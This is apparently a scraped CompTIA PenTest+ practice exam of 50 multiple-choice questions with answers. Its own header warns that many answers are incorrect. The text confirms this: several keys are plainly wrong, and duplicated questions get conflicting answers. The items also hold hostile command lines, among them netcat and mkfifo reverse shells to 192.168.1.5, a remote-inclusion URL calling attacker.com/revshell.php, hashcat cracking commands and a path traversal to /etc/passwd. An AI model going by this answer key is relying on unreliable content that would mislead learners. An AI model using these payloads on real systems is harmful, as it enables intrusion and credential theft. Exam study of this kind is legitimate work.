****DO NOT USE*** SO MANY INCORRECT ANSWERS ARE PROVIDED CompTIA Pentest PT0-001 (Exam Boost) Exam 1

Question 1

A penetration tester has performed a security assessment for a startup firm.

The report lists a total of ten vulnerabilities, with five identified as critical.

The client does not have the resources to immediately remediate all vulnerabilities.

Under such circumstances, which of the following would be the BEST suggestion for the client?

A.Apply easy compensating controls for critical vulnerabilities to minimize the risk, and the re-prioritize remediation
B.Identify the issues that can be remediated most quickly and address them first
C.Implement the least impactful of the critical vulnerabilities remediation’s first and then address the other critical vulnerabilities
D.Fix the most critical vulnerability first, even if it means fixing the other vulnerabilities over extended period of time

Answer 1

D.Fix the most critical vulnerability first, even if it means fixing the other vulnerabilities over extended period of time

Question 2

Which of the following is the reason why a pentester would run the following command at the end of an engagement?
A.To remove the persistence
B.To enable persistence
C.To report persistence
D.To check for persistence

Answer 2

A.To remove the persistence

Question 3

A pentester wants to target NetBIOS name service.
Which of the following is the MOST Likely command to exploit the NetBIOS name service?
A.arpspoof
B.nmap
C.responder
D.burpsuite

Answer 3

A.arpspoof

Question 4

A security consultant receives a document outlining the scope of an upcoming pentest.

This document contains IP addresses and times that each can be scanned.

Which of the following would contain this information?
A.Rules of Engagement
B.Request for Proposal
C.Master Service Agreement
D.Business Impact Analysis

Answer 4

A.Rules of Engagement

Question 5

A pentester was able to an SQL injection commands into a text box and gain access to the information stored on the database.

Which of the following is the best recommendation that would mitigate the vulnerability?
A.Randomize the credentials used to log in.
B. Install host-based intrusion detection
C.Implement input normalization
D.Perform system hardening

Answer 5

C.Implement input normalization

Question 6

Which of the following tools would a pentester use to conduct OSINT?
A.Shodan
B.SET
C.BeEF
D.Wireshark
E.Maltego
F.Dynamo

Answer 6

A.Shodan

E.Maltego

Question 7

A pentester is performing ARP spoofing against a switch.

Which of the following should the pentester spoof to get the most information?
A.MAC Address of the client
B.MAC Address of the Domain Controller
C.MAC address of the web server
D.MAC address of the gateway

Answer 7

D.MAC address of the gateway

Question 8

A pentester is able to move laterally throughout the domain with minimal roadblocks after compromising a single workstation.

Which of the following mitigation strategies would be BEST to recommend in the report?
(SELECT THREE)
A.Randomize local administrator credentials for each machine.
B.Disable remote logons for local administrators
C.Require multifactor authentication for all logins
D.Increase minimum password complexity requirements
E.Apply additional network access control
F.Enable Full-Disk Encryption on every workstation
G.Segment each host into its own VLAN

Answer 8

D.Increase minimum password complexity requirements
C.Require multifactor authentication for all logins
E.Apply additional network access control

Question 9

A security consultant is trying to attack a device with a previously identified user account.

The consultation is utilizing metasploit SMB vulnerabilities and is able to dump hashes.

Which of the following types of attacks is being executed?
A.Credential Dump Attack
B.DLL Injection Attack
C.Reverse Shell Attack
D.Pass the hash attack

Answer 9

A.Credential Dump Attack

Question 10

During a web application assessment, a pentester discovers that arbitrary commands can be executed on the server.

Wanting to take this attack one step further, the pentester begins to explore ways to gain a reverse shell back to the attack machine at 192.168.1.5.

Which of the following are possible ways to do so?
(CHOOSE TWO)
A.nc 192.168.1.5 44444
B.nc -nvlp 44444 -e /bin/sh
C. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1| nc 192.168.1.5 444444 > /tmp/f
D.nc -e /bin/sh 192.168.1.5 44444
E. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.5 444444 >/tmp/f
F.rm /tmpf;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.5.1 44444>/tmp/f

Answer 10

B.nc -nvlp 44444 -e /bin/sh

C. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1| nc 192.168.1.5 444444 > /tmp/

Question 11

Which of the following commands starts the Metasploit database?
A.msfconsole
B.workspace
C.msfvenom
D.db_init
E.db_connect

Answer 11

A.msfconsole

Question 12

A pentester is in the process of writing a report that outlines the overall level of risk to operations.

In which of the following areas of the report should the penetration tester put this?
A.Appendixes
B.Executive Summary
C.Technical Summary
D.Main Body

Answer 12

B.Executive Summary

Question 13

A pentester identifies the following findings during an external vulnerability scan:

Vulnerability:
Multiple unsupported version of Apache found (Ports 80, 443)
SSLv3 accepted on HTTPS connections (443)
Mod_rewrite enabled on Apache servers (80,443)
Windows Server 2012 Host Found (21)

A.Obsolete software may contain exploitable components
B.Weak password management practices may be employed
C.Cryptographically weak protocols may be intercepted
D.Web server configurations may reveal sensitive information

Answer 13

D.Web server configurations may reveal sensitive information

Question 14

Which of the following types of intrusion techniques is the use of an under-the-door tool during a physical security assessment an example of?
A.Lockpicking
B.Egress sensor triggering
C.Lock bumping
D.Lock bypass

Answer 14

D.Lock bypass

Question 15

During a test, a critical vulnerability is discovered on a clients core server.
Which of the following should be the next action?
A.Disable the network port of the affected service
B.Complete all findings, and the submit them to the client
C.Promptly alert the client with details of the finding
D.Take the target offline so it cannot be exploited by an attacker

Answer 15

C.Promptly alert the client with details of the finding

Question 16

A penetration tester has successfully deployed an evil twin and is starting to see some victim traffic.
The next step the pentester wants to take is to capture all the victim web traffic unencrypted.

Which of the following would meet this goal?
A.Perform an HTTP downgrade attack
B.Harvest the user credentials to decrypt traffic
C.Perform a MITM attack
D.Implement a CA attack by impersonating trusted CAs

Answer 16

A.Perform an HTTP downgrade attack

Question 17

A pentester wants to script out a way to discover all the RPTR records for a range of IP address.

Which of the following is the MOST efficient to utilize?
A.nmap -p 53 -oG dnslist.txt | cut -d “;” -f4
B.nslookup -ns 8.8.8.8 &laquo_space;dnslist.txt
C.for x in {1…254}; do dig -x 192.168.$x.$x;done
D.dig -r > echo “8.8.8.8”&raquo_space; /etc/resolv.conf

Answer 17

D.dig -r > echo “8.8.8.8”&raquo_space; /etc/resolv.conf

Question 18

An engineer, who is conducting a pentest for a web application, discovers the user login process sends data using the HTTP get method.

To mitigate the risk of exposing sensitive information, the form should be sent using an:

A.HTTP POST method
B.HTTP OPTIONS method
C.HTTP PUT method
D.HTTP TRACE method

Answer 18

A.HTTP POST method

Question 19

After gaining initial low-privilege access to a Linux system, a penetration tester identifies an interesting binary in a user’s home folder titled ‘changepass’

-sr-xr-x 1 root root 6443 Oct 18 2017 /home/user/changepass

Using string to print ASCII printable characters from changepass the tester notes the following:

$                    strings
changepass exit
setuid
strcmp
GLIBC_
2.0 
ENV_PA
TH
%S/
changep
w malloc
strlen

Given this information, which of the following is the MOST likely path to exploitation to achieve root privileges on the machine?
A.Copy changepass to a writable directory and export the ENV_PATH environmental variable to the path of a token-stealing binary titled changepw. Then run changepass
B.Create a copy of changepass in the same directory naming it changepw. Export the ENV_PATH environment variable to the path ‘/home/user’. Then run changepass
C.Export the ENV_PATH environmental variable to the path of a writable directory that contains a token-stealing binary titled changepw. Then run changepass.
D.Run changepass within the current directory with sudo after exporting the ENV_PATH environmental variable to the path of ‘/usr/local/bin

Answer 19

D.Run changepass within the current directory with sudo after exporting the ENV_PATH environmental variable to the path of ‘/usr/local/bin

Question 20

While monitoring WAF logs, a security analyst discovers a successful attack against the following URL:

https://example.com/index.php?Phone=http://attacker.com/badstuffhappens/revshell.php

Which of the following remediation steps should be taken to prevent this type of attack?
A.Implement a blacklist
B.Block URL Redirections
C.Double URL encode the parameters
D.Stop external calls from the application

Answer 20

D.Stop external calls from the application

Question 21

A pentester is performing a remote scan to determine if the server farm is compliant with the companys software baseline.

Which of the following should the pnentester perform to verify compliance with the baseline?
A.Discovery Scan
B.Stealth Scan
C.Full Scan
D.Credentialed Scan

Answer 21

D.Credentialed Scan

Question 22

A pentester was able to retrieve the intial VPN user domain credentials by phishing a member of the IT department.

Afterward, the pentester obtained hashes over the VPN and easily cracked them with a dictionary attack.

Which of the following remediation steps should be recommended? (SELECT THREE)
A.Mandate all employees take security awareness training
B.Implement two-factor authentication for remote access
C.Install an Intrustion Prevention System
D.Increase Password Complexity
E.Install a security information event monitoring system
F.Prevent members of the IT department from interactively logging in as administrators
G.Upgrade the cipher suite used for the VPN solution

Answer 22

A.Mandate all employees take security awareness training
B.Implement two-factor authentication for remote access
D.Increase Password Complexity

Question 23

While monitoring WAF logs, a security analyst discovers a successful attack against the following URL:

https://example.com/index.php?Phone=http://attacker.com/badstuffhappens/revshell.php

Which of the following remediation steps should be taken to prevent this type of attack?
A.Implement a blacklist
B.Block URL Redirections
C.Double URL encode the parameters
D.Stop external calls from the application

Answer 23

B.Block URL Redirections

Question 24

In which of the following scenarios would a tester perform a Kerberoasting attack?
A.The tester has compromised a Windows devices and dumps the LSA secrets
B.The tester needs to retrieve the SAM database and crack the password hashes
C.The tester has compromised a limited-privilege user and needs to target other acocunts for lateral movement
D.The tester has compromised an account and needs to dump hashes and plaintext passwords from the system

Answer 24

C.The tester has compromised a limited-privilege user and needs to target other acocunts for lateral movement

Question 25

A pentester was able to retrieve the intial VPN user domain credentials by phishing a member of the IT department.

Afterward, the pentester obtained hashes over the VPN and easily cracked them with a dictionary attack.

Which of the following remediation steps should be recommended? (SELECT THREE)
A.Mandate all employees take security awareness training
B.Implement two-factor authentication for remote access
C.Install an Intrusion Prevention System
D.Increase Password Complexity
E.Install a security information event monitoring system
F.Prevent members of the IT department from interactively logging in as administrators
G.Upgrade the cipher suite used for the VPN solution

Answer 25

A.Mandate all employees take security awareness training
B.Implement two-factor authentication for remote access
D.Increase Password Complexity

Question 26

A pentester is reviewing the following output from a wireless sniffer:

ESSID BSSID Encryption Channel WPS
Guest AD:1F:AB:10:33:78 OPEN 6 N
Secure AD:1F:AB:10:33:79 WPA2-PSK 6 N
Dev AD:1F:AB:10:33:70 WPA2-ENT 11 N

A.Hardware Vendor
B.Channel Interface
C.Usernames
D.Key Strength

Answer 26

C.Usernames

Question 27

In which of the following scenarios would a tester perform a Kerberoasting attack?
A.The tester has compromised a Windows devices and dumps the LSA secrets
B.The tester needs to retrieve the SAM database and crack the password hashes
C.The tester has compromised a limited-privilege user and needs to target other acocunts for lateral movement
D.The tester has compromised an account and needs to dump hashes and plaintext passwords from the system

Answer 27

C.The tester has compromised a limited-privilege user and needs to target other accounts for lateral movement

Question 28

While trying to maintain persistence on a Windows system with limited privileges, which of the following registry keys should the tester use?
A.HKEY_CLASSES_ROOT
B.HKEY_LOCAL_MACHINE
C.HKEY_CURRENT_USER
D.HKEY_CURRENT_CONFIG

Answer 28

C.HKEY_CURRENT_USER

Question 29

A pentester is preparing to conduct API testing.

Which of the following would be MOST helpful in preparing for this engagement?
A,Nikto
B.WAR
C.W3AF
D.Swagger

Answer 29

D.Swagger

Question 30

During an internal network pentest, a tester recovers the NTLM password hash for a user known to have full admin privileges on a number of target systems.

Effort to crack the hash and recover the plaintext password have been unsuccessful.

Which of the following would be the BEST target for continued exploitation efforts?
A.Windows 7 (Ports 23, 161)
B.Windows Server 2016 (Ports 53,5900)
C. Windows 8.1 Open (Ports 445, 3389)
D.Windows 8 (Ports 514,3389)

Answer 30

A.Windows 7 (Ports 23, 161)

Question 31

A pentester delivers a web application vulnerability scan report to a client.
The pentester rates a vulnerability as medium severity.
The same vulnerability was reported as a critical finding on the previous report.
Which of the following is the most likely reason for the reduced severity?
A.The client has applied a hot fix without updating the version
B.The threat landscape has significantly changed
C.The client updated their codebase with new features
D.There are currently no known exploits for this vulnerability

Answer 31

A.The client has applied a hot fix without updating the version

Question 32

An attacker uses SET to make a copy of a companys cloud hosted web mail portal and sends an email in hopes the CEO logs in to obtain the CEOs login credentials.
A.Elicitation attack
B.Impersonation attack
C.Spear phishing
D.Drive-by download attack

Answer 32

C.Spear phishing

Question 33

A pentester is scanning a network for SSH and has a list of provided targets.

Which of the following nmap commands should the tester use?
A.nmap -p 22 -iL targets
B.nmap -p 22 -sL targets
C.nmap -p 22 -oG targets
D.nmap -p 22 -oA targets

Answer 33

A.nmap -p 22 -iL targets

Question 34

A pentester has comrpomised a host.
Which of the following would be the correct syntax to create a Netcat listener on the device?
A.nc -l -p 4444 /bin/bash
B.nc -vp 4444 /bin/bash
C.nc -p 4444 /bin/bash
D.nc -lp 4444 /bin/bash

Answer 34

D.nc -lp 4444 /bin/bash

Question 35

A pentester has been assigned to perform an external pentest assessment of a company.

Which of the following would BEST help with passive information gathering?

A.Wait outside the company’s building and attempt to tailgate behind an employee

B.Perform a vulnerability scan against the company’s external netblock, identify exploitable vulnerabilities and attempt to gain access

C.Use domain and IP registry websites to identify the companys external netblocks and external facing applications

D.Search social media for information technology employees who post information about the tech they work with

E.Identify the company’s external facing webmail application, enumerate user accounts and attempt password guessing to gain access

Answer 35

C.Use domain and IP registry websites to identify the companys external netblocks and external facing applications

Question 36

A client asks a pentester to add more addresses to a test currently in progress.

Which of the following would define the target list?
A.Rules of engagement
B.Master Service Agreement
C.Statement of Work
D.End-User License Agreement

Answer 36

C.Statement of Work

Question 37

Which of the following BEST explains why it is important to maintain confidentiality of any identified findings when performing a pentest?
A.Pentest findings often contain intellectual property
B.Pentest findings could lead to consumer dissatisfaction if made public
C.Pentest findings are legal documents containing privileged information
D.Pentest findings can assist an attacker in compromising a system

Answer 37

D.Pentest findings can assist an attacker in compromising a system

Question 38

A pentester has comrpomised a host.
Which of the following would be the correct syntax to create a Netcat listener on the device?
A.nc -l -p 4444 /bin/bash
B.nc -vp 4444 /bin/bash
C.nc -p 4444 /bin/bash
D.nc -lp 4444 /bin/bash

Answer 38

A.nc -l -p 4444 /bin/bash

Question 39

A pentester has been assigned to perform an external pentest assessment of a company.

Which of the following would BEST help with passive information gathering? (Choose two)

A.Wait outside the company’s building and attempt to tailgate behind an employee

B.Perform a vulnerability scan against the company’s external netblock, identify exploitable vulnerabilities and attempt to gain access

C.Use domain and IP registry websites to identify the companys external netblocks and external facing applications

D.Search social media for information technology employees who post information about the tech they work with

E.Identify the company’s external facing webmail application, enumerate user accounts and attempt password guessing to gain access

Answer 39

C.Use domain and IP registry websites to identify the companys external netblocks and external facing applications

D.Search social media for information technology employees who post information about the tech they work with

Question 40

A software development team recently migrated to new application software on the on-premise environment.

Pentest findings show that multiple vulnerabilities exist.

If a pentester does not have access to a live or test environment, a test might be better to create the same environment on the VM.

WHich of the following is most important for confirmation?
A.Unsecure service and protocol configuration
B.Running SMB and SMTP service
C.Weak password complexity and user account
D.Misconfiguration

Answer 40

D.Misconfiguration

Question 41

A software development team recently migrated to new application software on the on-premise environment.

Pentest findings show that multiple vulnerabilities exist.

If a pentester does not have access to a live or test environment, a test might be better to create the same environment on the VM.

Which of the following is most important for confirmation?
A.Unsecure service and protocol configuration
B.Running SMB and SMTP service
C.Weak password complexity and user account
D.Misconfiguration

Answer 41

D.Misconfiguration

Question 42

A pentester is checking a script to determine why some basic math errors are persisting

The expected result was the program outputting “True”.

root:~# cat ./test.sh
#!/bin/bash
source=10
let dest5=5

if ['source' = 'dest' ] ; then
echo "True"
else 
echo "False"
fi
#End of File

Given the output from the console above, which of the following explains how to correct the errors in the script?
(Choose Two)
A.Change ‘fi’ to ‘Endli’
B.Remove the ‘let’ in front of ‘dest=5+5’
C.Change the ‘=’ to ‘eq’
D.Change source and dest to “$source” and”$dest”
E.Change ‘else’ to ‘elif’

Answer 42

C.Change the ‘=’ to ‘eq’

E.Change ‘else’ to ‘elif’

Question 43

After performing a security assessment for a firm, the client was found to have been billed for the time the clients test environment was unavailable.

The client claims to have been billed unfairly.

Which of the following documents would most likely be able to provide guidance in such a situation?
A.SOW
B.NDA
C.EULA
D.BPA

Answer 43

A.SOW

Question 44

A software development team recently migrated to new application software on the on-premise environment.

Pentest findings show that multiple vulnerabilities exist.

If a pentester does not have access to a live or test environment, a test might be better to create the same environment on the VM.

Which of the following is most important for confirmation?
A.Unsecure service and protocol configuration
B.Running SMB and SMTP service
C.Weak password complexity and user account
D.Misconfiguration

Answer 44

A.Unsecure service and protocol configuration

Question 45

A tester has captured a NetNTLMv2 hash using Responder.

Which of the following commands will allow the tester to crack the hash using a mask attack?
A.hashcat -m 5600 -r rule/bestG4.rule hash.txt wordlist.txt
B.hashcat -m 5600 hash.txt
C.hashcat -m 5600 -a 3 hash.txt ?a?a?a?a?a?a?
D.hashcat -m 5600 -o results.text hash.txt wordlist.txt

Answer 45

C.hashcat -m 5600 -a 3 hash.txt ?a?a?a?a?a?a?

Question 46

A pentester has ran the following Nmap scan on a computer:

‘nmap -aV 192.168.1.5’

The organization said it had disabled telnet from its enviornemnt.

However, the results of the Nmap scan show port 22 as closed and port 23 as open to SSH.

Which of the following is the BEST explanation for what happened?
A.The organization failed to disable Telnet
B.Nmap results contain a false positive for port 23
C.Port 22 was filtered
D.The service is running on a non-standard port

Answer 46

D.The service is running on a non-standard port

Question 47

A pentester has ran the following Nmap scan on a computer:

‘nmap -aV 192.168.1.5’

The organization said it had disabled telnet from its enviornemnt.

However, the results of the Nmap scan show port 22 as closed and port 23 as open to SSH.

Which of the following is the BEST explanation for what happened?
A.The organization failed to disable Telnet
B.Nmap results contain a false positive for port 23
C.Port 22 was filtered
D.The service is running on a non-standard port

Answer 47

D.The service is running on a non-standard port

Question 48

Which of the following has a direct and significant impact on the budget of the security assessment?
A.Scoping
B.Scheduling
C.Compliance requirement
D.Target Risk

Answer 48

A.Scoping

Question 49

During an internal pentest, several multicast and broadcast name resolution requests are observed traversing the network.

Which of the following tools could be used to imperonate network resources and collect authentication requests?
A.Ettercap
B.Tcpdump
C.Responder
D.Medusa

Answer 49

A.Ettercap

Question 50

Given the following URL:

http://example.com/download.php?id-…/…/…/etc/passwd

Which of the following best describes the above attack?
A.Malicious file upload attack
B.Redirect attack
C.Directory traversal attack
D.Insecure direct object reference attack

Answer 50

C.Directory traversal attack